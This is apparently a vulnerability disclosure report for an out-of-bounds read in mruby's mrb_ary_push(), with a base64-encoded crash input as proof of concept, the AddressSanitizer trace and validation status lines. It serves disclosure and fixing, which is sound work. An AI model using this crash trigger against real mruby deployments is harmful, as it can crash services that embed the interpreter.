Out-of-bounds Read in mruby/mruby
Valid
Reported on Feb 21st 2022
Description
OOB read occurs in mrb_ary_push().
commit: 5d9239c2c4644fa8a59d9f5159b4950569dd5e0e
Proof of Concept
# poc
$ echo -ne "WzpfXVswLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDBdPTpO" | base64 -d > poc
# ASAN
$ ./bin/mruby poc
AddressSanitizer:DEADLYSIGNAL
=================================================================
==503792==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x0000004f7484 bp 0x7ffffffed6f0 sp 0x7ffffffed4a0 T0)
==503792==The signal is caused by a READ memory access.
==503792==Hint: address points to the zero page.
    #0 0x4f7484 in mrb_ary_push /home/alkyne/mruby-debug/src/array.c:503:17
    #1 0x5ee6f1 in mrb_vm_exec /home/alkyne/mruby-debug/src/vm.c:2633:9
    #2 0x5c1bca in mrb_vm_run /home/alkyne/mruby-debug/src/vm.c:1130:12
    #3 0x5bbfd9 in mrb_top_run /home/alkyne/mruby-debug/src/vm.c:3039:12
    #4 0x697a2b in mrb_load_exec /home/alkyne/mruby-debug/mrbgems/mruby-compiler/core/parse.y:6890:7
    #5 0x698c0b in mrb_load_detect_file_cxt /home/alkyne/mruby-debug/mrbgems/mruby-compiler/core/parse.y:6933:12
    #6 0x4cf83f in main /home/alkyne/mruby-debug/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
    #7 0x7ffff7a710b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #8 0x41d6ed in _start (/home/alkyne/mruby-debug/bin/mruby+0x41d6ed)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/alkyne/mruby-debug/src/array.c:503:17 in mrb_ary_push
==503792==ABORTING
We are processing your report and will contact the mruby team within 24 hours. (a year ago)
Yukihiro "Matz" Matsumoto modified the report (a year ago)
array.c#L2633 has been validated
array.c#L3039 has been validated